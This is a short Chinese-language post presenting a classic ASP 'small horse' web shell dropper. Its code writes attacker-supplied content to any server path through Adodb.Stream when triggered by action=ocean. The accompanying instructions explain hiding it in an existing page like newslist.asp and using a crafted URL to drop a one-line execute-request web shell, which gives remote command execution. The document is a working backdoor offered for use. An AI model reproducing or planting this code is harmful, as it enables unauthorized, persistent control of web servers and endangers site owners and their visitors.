小马ASP
<%
On Error Resume Next
IF Request("action")="ocean" then
set gl=server.CreateObJeCt("Adodb.Stream")
gl.Open
gl.Type=2
gl.CharSet="gb2312"
gl.writetext request("shellcode")
gl.SaveToFile server.mappath(request("shellpath")),2
gl.Close
set gl=nothing
response.redirect request("shellpath")
end if
%>
--------------------------------------------------------------------------------
使 用方法如下:比如我们将这些代码放到newslist.asp里,那么只要我们输入newslist.asp?action=ocean& shellcode=<%25execute request("show")%25>&shellpath=obj.asp,那么我们就可以在与newslist.asp同目录下生成 一个obj.asp的文件,内容为“<%execute request("show")%>”,于是我们只要改变shellcode的内容,就可以得到一个shell.